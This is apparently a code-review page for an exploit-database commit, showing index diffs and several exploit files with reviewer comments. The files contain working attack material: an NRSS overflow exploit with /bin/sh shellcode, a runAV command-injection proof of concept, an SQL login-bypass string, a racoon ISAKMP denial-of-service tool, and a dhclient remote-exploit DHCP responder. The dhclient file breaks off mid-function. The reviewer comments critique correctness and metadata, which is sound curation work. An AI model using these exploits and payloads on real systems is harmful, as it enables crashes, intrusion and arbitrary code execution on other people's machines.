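Review bot: 36563 duplicates 36560 (Joomla Gallery WD, CrashBandicot, 2015-03-30), so dropping it from the index is right, but platforms/php/webapps/36563.txt is not shown as deleted anywhere on this page; remove the file in the same commit so the repository does not carry an unindexed copy.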
@ -33722,8 +33712,7 @@ id,file,description,date,author,platform,type,port
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,hyp3rlinx,php,webapps,80
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37349,platforms/windows/dos/37349.txt,"Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 - .PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37361,platforms/php/webapps/37361.txt,"WordPress Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
37362,platforms/lin_x86-64/shellcode/37362.c,"linux/x86-64 execve(/bin/sh) 30 bytes",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0
37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection Vulnerabilities",2015-06-24,cfreer,php,webapps,80
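Review bot: 37349 (PDF parsing) is deleted while its sibling 37348 is retitled to ".PNG Parsing" only. If the PDF case was folded into the 37348 advisory the title should say so, the way the CityPost merge in this commit lists all parameters; if it was simply dropped, the reason is missing. The existing ordering 37360, 37346, 37347, 37348 in this region is also out of sequence and untouched here.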
@ -36016,3 +36005,6 @@ id,file,description,date,author,platform,type,port
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809..cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
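Review bot: 39811 is indexed as platform linux, type local, with the title "runAV mod_security - Arbitrary Command Execution", while the advisory file added in this same commit is headed "runAV mod_security Remote Command Execution"; the two should agree. Given that the PoC invokes ./runAV from a shell with a crafted argument, local is defensible, but then the advisory title is wrong, and if the intended vector is a request that reaches runAV through ModSecurity the type should be remote. 39810 as linux/local and 39812 as multiple/dos match their content.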



@ -1,31 +0,0 @@
-----------------------------------------------------
-----------------------------------------------------
Absolute Form Processor XE-V 1.5 (auth Bypass) Remote Sql Injecion
-----------------------------------------------------
Founder: ThE g0bL!N(Dz)
Home: www.h4ckf0ru.com
Vive Algerie
# demo : http://www.xigla.com/absolutefp/demo/
Note : Les Algerien Rasa wa Li Yekhreb Fina Basa :)
-----------------------------------------------------------
-----------------------------------------------------------
exploit
-------
http://www.xigla.com/absolutefp/demo/login.asp
username: ' or '1=1
Password: ThE g0bL!N Or any Thing
demo:
-----
http://www.xigla.com/absolutefp/demo/login.asp
------------------------------------------------------
------------------------------------------------------
Thanx :
M0nSt3r-Dz - Master_FinaL - Dr-HTmL - Super Cristal- Hcoca_Man - Dreadful
Yassine_Enp- ViRuS_HaCkEr_Dz-Mr.JOoMJOoM-Naili- Str0ke - Milw0rm.com
------------------------------------------------------------------------------------
www.h4ckf0ru.com/vb/
------------------------------------------------------------------------------------
# milw0rm.com [2009-04-24]
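Review bot: the whole content of this deleted advisory is one login payload, username ' or '1=1 with any password, pointed at the vendor demo at xigla.com, with no affected file, parameter or fix information; it is the "(auth Bypass)" entry 8528 dropped from the index in the -8036 hunk, so the deletion is consistent, and 8529 and 8530 for the same product remain indexed.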

platforms/linux/local/39810.py Executable file

@ -0,0 +1,58 @@
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: NRSS RSS Reader
# Version: 0.3.9-1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: NRSS is a console based RSS reader allowing
# uses to read and manage RSS feeds
# Kali Linux 2.0 package: pool/main/n/nrss/nrss_0.3.9-1_i386.deb
# MD5sum: 27d997c89340ebb6f4a1d9e1eb28ea39
# Website: http://www.codezen.org/nrss/
#
# gdb$ run -F $(python -c 'print "A"*256+"DCBA"')
# Starting program: /usr/bin/nrss -F $(python -c 'print "A"*256+"DCBA"')
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000000 EBX: 0x41414141 ECX: 0x00000000 EDX: 0x0809040C o d I t S z a p c
# ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFED60 EIP: 0x41424344
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
# Cannot access memory at address 0x41424344
# 0x41424344 in ?? ()
import os, subprocess
def run():
try:
print "# NRSS News Reader - Stack Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 256
nopsled = "\x90"*200
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\xd0\xec\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["nrss -F",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, NRSS Reader - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit NRSS Reader v0.3.9-1 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
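Review bot: the payload built by "buffer = nopsled * (buffersize-len(shellcode)) + eip" never contains the shellcode and is far larger than the comment "NOPSLED + SHELLCODE + EIP" describes: nopsled is already 200 bytes, the shellcode string is 24 bytes, so the expression repeats the 200-byte sled 232 times (46,400 bytes) and appends eip at an offset nowhere near the 256 bytes the gdb transcript above establishes ("A"*256 + "DCBA" gives EIP 0x41424344). It should be the sled plus shellcode padded to 256 bytes, then eip. The call subprocess.call(["nrss -F", ' ', buffer]) passes "nrss -F" as a single argv[0], so it will fail with ENOENT (and print "Not found!") even when nrss is installed; use ["nrss", "-F", buffer]. howtousage() calls sys.exit without importing sys, the try block in __main__ contains only print statements so the IndexError handler is dead code, and os.errno is not a public attribute on current Python. The hard-coded return address 0xbfffecd0 only holds with ASLR disabled on the Kali 2.0 x86 image named in the header, which the file should state.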

platforms/linux/local/39811.txt Executable file

@ -0,0 +1,46 @@
# Title : runAV mod_security Remote Command Execution
# Date : 13/05/2016
# Author : R-73eN
# Tested on : mod_security with runAV Linux 4.2.0-30-generic #36-Ubuntu SMP Fri Feb 26 00:57:19 UTC 2016 i686 i686 i686 GNU/Linux
# Software : https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/util/av-scanning/runAV
# Vendor : https://www.modsecurity.org/
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
#include "common.h"
main(int argc, char *argv[])
{
char cmd[MAX_OUTPUT_SIZE];
char output[MAX_OUTPUT_SIZE];
int error;
char *colon;
char *keyword;
if (argc > 1) {
sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);
output[0] = '\0';
error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
+++++++++++++++++ OTHER CODE +++++++++++++++++++++++++++++++++
The argv[1] parameter is passed unsanitized to a sprintf function which sends the formatted output to the cmd variable,
which is later passed as a parameter to a run_cmd function on line 14.
https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/av-scanning/runAV/runAV.c#L14
POC:
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ./runAV "foo.php;touch /tmp/pwn3d"
sh: 1: /usr/bin/clamscan: not found
1 exec empty: OK
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$ ls -la /tmp/ | grep pwn3d
-rw-rw-r-- 1 snort snort 0 Maj 13 16:45 pwn3d
snort@snort-VirtualBox:/usr/share/modsecurity-crs/util/av-scanning/runAV$
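Review bot: the root cause is shown but the remote vector is not. The PoC runs `./runAV "foo.php;touch /tmp/pwn3d"` from a local shell, which proves that run_cmd() hands the sprintf-built string to `sh` (the `sh: 1: /usr/bin/clamscan: not found` line is the shell's own error, yet `/tmp/pwn3d` is still created), but nothing in the write-up shows how argv[1] becomes attacker-controlled when mod_security invokes runAV on an upload. A title of "Remote Command Execution" needs a sentence on which CRS rule passes the uploaded file's path or name to the scanner and which characters that name must carry (here `;`). Two further points on the quoted source: `sprintf (cmd, "/usr/bin/clamscan --no-summary %s", argv[1]);` writes into the fixed-size local `cmd[MAX_OUTPUT_SIZE]` with no length check, so an over-long argument is a stack overflow independent of the injection; and the fix is not quoting or escaping but dropping the shell round-trip, i.e. fork/execve of clamscan with argv[1] passed as a separate argument (or at minimum rejecting any path containing shell metacharacters before the sprintf). The "line 14" link should also point at a commit hash rather than master, since the line will move.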



@ -1,37 +0,0 @@
Name : I-net Multi User Email Script SQLi Vulnerability
Date : june, 27 2010
Critical Level : HIGH
Vendor Url : http://www.i-netsolution.com/
Google Dork: inurl:/jobsearchengine/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
i-Net Multi User Email Script to start your own Email Website like GMAIL, YAHOO Mail, Hot Mail made in CGI/PERL, tested over Linux
Servers. Features of i-Net Multi User Email Script, Advanced Spam Filtering, RBL Blacklisting, Completely MIME compatible, Contact List
Members Filter Proof, Multiple Skins, Limit Users Outgoing Mail (Depending on User Level) Sort Inbox With Several Criteria, Fully
customizable via HTML templates, Mod_Perl Compatible, New Mail Sounds, WYSIWYG Mail Interface, Multiple Tiered Premium Accounts, Premium
Accounts using Paypal & Subscriptions, SMTP or Send mail, Fully functional calendar and scheduler, Unlimited User Folders, Folder Filtering
(Incoming mail directed to specific folders), Email notifications of new mail, MySQL backend, Backup, Powerful Admin Panel, Ban IP, Advanced
User Editing, Account Suspensions, User Address Book, i-Net Talk and many more features.
#######################################################################################################
Xploit: SQLi VUlnerability
The I-net Multi User Email Script has SQli vuln :D
DEMO URL : http://<server>/path/products/2daybizemail/php121_editname.php?uid=[sqli]
###############################################################################################################
# 0day no more
# Sid3^effects
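Review bot: nothing of substance is lost by this removal. The entry has no payload beyond `uid=[sqli]`, no affected version, no vendor contact, and the demo path `products/2daybizemail/php121_editname.php` points at a PHP script under a "2daybizemail" directory while the product is described as CGI/Perl, so the path does not obviously belong to the software named in the title.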


@ -1,140 +0,0 @@
/* racoon-isakmp-dos.c
*
* Copyright (c) 2009 by <mu-b@digit-labs.org>
*
* ipsec-tools racoon frag-isakmp DoS POC
* by mu-b - Thu Apr 02 2009
*
* - Tested on: ipsec-tools-0.7.1
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#define DEF_PORT 500
#define PORT_ISAKMP DEF_PORT
#define ISAKMP_VERSION_NUMBER 0x10
#define ISAKMP_ETYPE_BASE 1 /* Base */
/* Frag does not seems to be documented */
#define ISAKMP_NPTYPE_FRAG 132 /* IKE fragmentation payload */
/* flags */
#define ISAKMP_FRAG_LAST 1
typedef u_char cookie_t[8];
/* 3.1 ISAKMP Header Format */
struct isakmp {
cookie_t i_ck; /* Initiator Cookie */
cookie_t r_ck; /* Responder Cookie */
unsigned char np; /* Next Payload Type */
unsigned char v;
unsigned char etype; /* Exchange Type */
unsigned char flags; /* Flags */
unsigned int msgid;
unsigned int len; /* Length */
};
/* IKE fragmentation payload */
struct isakmp_frag {
unsigned short unknown0; /* always set to zero? */
unsigned short len;
unsigned short unknown1; /* always set to 1? */
unsigned char index;
unsigned char flags;
};
/* used to verify the r_ck. */
static u_char r_ck0[] = { 0,0,0,0,0,0,0,0 };
static void
isa_kmp_dos (char *host)
{
char buf[sizeof (struct isakmp) +
sizeof (struct isakmp_frag)];
struct isakmp *hdr;
struct isakmp_frag *frag;
struct sockaddr_in saddr;
struct hostent *hp;
int fd, i, len, n;
if ((fd = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror ("socket()");
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (EXIT_FAILURE);
}
memset (&saddr, 0, sizeof saddr);
memcpy ((char *) &saddr.sin_addr, hp->h_addr, hp->h_length);
saddr.sin_family = AF_INET;
saddr.sin_port = htons (PORT_ISAKMP);
/* formulate request */
memset (buf, 0, sizeof (buf));
hdr = (struct isakmp *) buf;
frag = (struct isakmp_frag *) (hdr + 1);
for (i = 0; i < sizeof (hdr->i_ck); i++)
hdr->i_ck[i] = (rand () % 255) + 1;
memcpy (&hdr->r_ck, r_ck0, sizeof (hdr->r_ck));
hdr->v = ISAKMP_VERSION_NUMBER;
hdr->flags = 0;
hdr->etype = ISAKMP_ETYPE_BASE;
hdr->msgid = 0;
hdr->np = ISAKMP_NPTYPE_FRAG;
len = sizeof (struct isakmp) + sizeof (struct isakmp_frag);
hdr->len = htonl (len);
frag->len = htons (sizeof (struct isakmp_frag));
frag->index = 1;
frag->flags = ISAKMP_FRAG_LAST;
n = sendto (fd, hdr, len, 0, (struct sockaddr *) &saddr, sizeof saddr);
if (n < 0 || n != len)
{
fprintf (stderr, "isa_kmp_dos: sendto %d != %d\n", n, len);
exit (EXIT_FAILURE);
}
close (fd);
}
int
main (int argc, char **argv)
{
printf ("ipsec-tools racoon frag-isakmp DoS PoC\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
printf ("* crashing racoon... ");
isa_kmp_dos (argv[1]);
printf ("done\n\n");
return (EXIT_SUCCESS);
}
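Review bot: the file never states what the crafted datagram does to racoon, which a DoS PoC should. What is sent is recoverable from isa_kmp_dos(): a 28-byte ISAKMP header with a random initiator cookie, an all-zero responder cookie, base exchange, next payload 132 (IKE fragment), followed by a single 8-byte fragment payload whose length is its own header size (`frag->len = htons (sizeof (struct isakmp_frag));`), fragment index 1 and the LAST flag, i.e. a final fragment carrying zero bytes of data. One sentence on why a zero-length last fragment crashes ipsec-tools-0.7.1, and which versions are affected, would make the entry reviewable. Code points: `rand ()` is used for the cookie without `srand ()`, so every run sends the same cookie, which both defeats the apparent intent and makes the packet trivially signaturable; `msgid` and `len` in `struct isakmp` are `unsigned int` where `uint32_t` is meant, since the on-wire layout depends on them being 4 bytes; the fragment fields `unknown0`/`unknown1` are left unexplained; and the usage path exits with EXIT_SUCCESS.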


@ -0,0 +1,80 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740
The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0
READ of size 16385 at 0x61b00001335c thread T0
#0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438
#1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)
#2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32
#3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21
#4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13
#5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21
#6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9
#7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10
#8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9
#11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11
#12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8
#13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9
#14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8
#15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8
#16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3
#17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#18 0x52eebb in process_packet wireshark/tshark.c:3748:5
#19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11
#20 0x51e4bc in main wireshark/tshark.c:2213:13
0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)
allocated by thread T0 here:
#0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2
#3 0x5244dd in cf_open wireshark/tshark.c:4215:9
#4 0x51decd in main wireshark/tshark.c:2204:9
SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy
Shadow bytes around the buggy address:
0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8910==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip
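Review bot: the entry is a verbatim crash dump and should state the root cause in one line, which the trace already supports: the READ of size 16385 at `AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360` via g_memdup runs past a 1500-byte region allocated in `wtap_open_offline`, i.e. the packet buffer, so a length field evidently taken from the 4-way-handshake frame is passed to the copy without being checked against the bytes actually present. That is what a defender needs to judge exposure or write a detection; "current git master" alone does not identify affected releases, so the Bugzilla id 12175 should be paired with the fixed version once known. The shadow-byte legend (from `Shadow byte legend` to `Right alloca redzone`) is ASAN boilerplate identical in every report and could be cut from the database copy; the 39812.zip link with the three trigger files is the actual PoC.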


@ -1,306 +0,0 @@
/*
* cve-2009-0692.c
*
* ISC DHCP dhclient < 3.1.2p1 Remote Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692
*
* Stack-based buffer overflow in the script_write_params method in
* client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before
* 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to
* execute arbitrary code via a crafted subnet-mask option.
*
* Usage:
*
* $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet
* $ sudo ./cve-2009-0692
* [+] listening on eth0: ip and udp and src port 68 and dst port 67
* [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920
* [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920
*
* $ gdb /sbin/dhclient
* ...
* DHCPREQUEST on eth0 to 255.255.255.255 port 67
* DHCPACK from 0.6.9.2
* ...
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
*
* Notes:
*
* Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free
* to tweak for your target platform. Depends on libdnet and libpcap.
*
* READABLE_1 and READABLE_2 need to be readable addresses as we fix up the
* stack during our overflow. After a successful return from the vulnerable
* script_write_params function, EIP will be set to JMP_TARGET.
*
* Exclusively for use at DEFCON next week. ;-)
*/
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <dnet.h>
#include <pcap.h>
#define READABLE_1 "\xa8\xfc\x0b\x08" /* for es.client */
#define READABLE_2 "\xbc\x34\x0a\x08" /* for es.prefix */
#define JMP_TARGET "\x41\x41\x41\x41"
#define BPF_FILTER "ip and udp and src port 68 and dst port 67"
#define PKT_BUFSIZ 1514
#define DHCP_OP_REQUEST 1
#define DHCP_OP_REPLY 2
#define DHCP_TYPE_REQUEST 3
#define DHCP_TYPE_ACK 5
#define DHCP_OPT_REQIP 50
#define DHCP_OPT_MSGTYPE 53
#define DHCP_OPT_END 255
#define DHCP_CHADDR_LEN 16
#define SERVERNAME_LEN 64
#define BOOTFILE_LEN 128
#define DHCP_HDR_LEN 240
#define DHCP_OPT_HDR_LEN 2
#ifndef __GNUC__
# define __attribute__(x)
# pragma pack(1)
#endif
struct dhcp_hdr {
uint8_t op;
uint8_t hwtype;
uint8_t hwlen;
uint8_t hwopcount;
uint32_t xid;
uint16_t secs;
uint16_t flags;
uint32_t ciaddr;
uint32_t yiaddr;
uint32_t siaddr;
uint32_t giaddr;
uint8_t chaddr[DHCP_CHADDR_LEN];
uint8_t servername[SERVERNAME_LEN];
uint8_t bootfile[BOOTFILE_LEN];
uint32_t cookie;
} __attribute__((__packed__));
struct dhcp_opt {
uint8_t opt;
uint8_t len;
} __attribute__((__packed__));
#ifndef __GNUC__
# pragma pack()
#endif
void
process(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)
{
eth_t *raw;
struct ip_hdr *ip_h;
struct eth_hdr *eth_h;
struct udp_hdr *udp_h;
struct dhcp_hdr *dhcp_h;
struct dhcp_opt *dhcp_opt;
char *dev = data, *ptr;
char pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];
int opt_len, clen = pkthdr->caplen;
uint8_t msg_type = 0, payload_len = 0;
uint32_t yiaddr = 0;
/* packet too short */
if (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {
return;
}
eth_h = (struct eth_hdr *) pkt;
ip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);
udp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);
dhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);
dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);
/* only care about REQUEST opcodes */
if (dhcp_h->op != DHCP_OP_REQUEST) {
return;
}
/* parse DHCP options */
while (1) {
if (dhcp_opt->opt == DHCP_OPT_MSGTYPE) {
if (dhcp_opt->len != 1) {
return;
}
memcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);
}
if (dhcp_opt->opt == DHCP_OPT_REQIP) {
if (dhcp_opt->len != 4) {
return;
}
memcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);
}
if (dhcp_opt->opt == DHCP_OPT_END) {
break;
}
if (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) {
break;
}
dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len);
}
/* only care about REQUEST msg types */
if (msg_type != DHCP_TYPE_REQUEST) {
return;
}
printf("[+] snarfed DHCP request from %s with xid 0x%08x\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid);
printf("[+] sending malicious DHCP response to %s with xid 0x%08x\n\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid);
/* construct stack payload */
memset(payload, 0, sizeof(payload));
ptr = payload;
memset(ptr, 0, 16);
ptr += 16;
memcpy(ptr, READABLE_1, 4);
ptr += 4;
memcpy(ptr, READABLE_2, 4);
ptr += 4;
memset(ptr, 0, 8);
ptr += 8;
memcpy(ptr, "\x04\x00\x00\x00", 4);
ptr += 4;
memset(ptr, 0, 28);
ptr += 28;
memcpy(ptr, JMP_TARGET, 4);
ptr += 4;
payload_len = ptr - payload;
/* dhcp header */
dhcp_h->op = DHCP_OP_REPLY;
memcpy(&dhcp_h->yiaddr, &yiaddr, 4);
/* normal dhcp options */
memset(options, 0, sizeof(options));
ptr = options;
memcpy(ptr, "\x35\x01\x05", 3);
ptr += 3;
memcpy(ptr, "\x36\x04\x00\x06\x09\x02", 6);
ptr += 6;
memcpy(ptr, "\x33\x04\x00\x09\x3a\x80", 6);
ptr += 6;
memcpy(ptr, "\x03\x04\x00\x06\x09\x02", 6);
ptr += 6;
memcpy(ptr, "\x06\x04\x00\x06\x09\x02", 6);
ptr += 6;
/* malicious subnet mask option */
memcpy(ptr, "\x01", 1);
ptr += 1;
memcpy(ptr, &payload_len, 1);
ptr += 1;
memcpy(ptr, payload, payload_len);
ptr += payload_len;
memcpy(ptr, "\xff", 1);
ptr += 1;
opt_len = ptr - options;
/* construct full packet payload */
memset(pktbuf, 0, sizeof(pktbuf));
ptr = pktbuf;
eth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\xc1\x1e\x20\x09\x06\x92", ETH_TYPE_IP);
ptr += ETH_HDR_LEN;
ip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);
ptr += IP_HDR_LEN;
udp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
ptr += UDP_HDR_LEN;
memcpy(ptr, dhcp_h, DHCP_HDR_LEN);
ptr += DHCP_HDR_LEN;
memcpy(ptr, options, opt_len);
ptr += opt_len;
ip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
/* fire off malicious response */
raw = eth_open(dev);
if (!raw) {
fprintf(stderr, "[-] error opening raw socket on %s\n", dev);
exit(1);
}
eth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);
eth_close(raw);
}
void
usage(char **argv)
{
fprintf(stderr, "usage: %s [-i interface]\n", argv[0]);
exit(1);
}
int
main(int argc, char **argv)
{
int ch, ret;
char *dev = NULL;
char errbuf[PCAP_ERRBUF_SIZE];
struct bpf_program bfp;
pcap_t *ph;
opterr = 0;
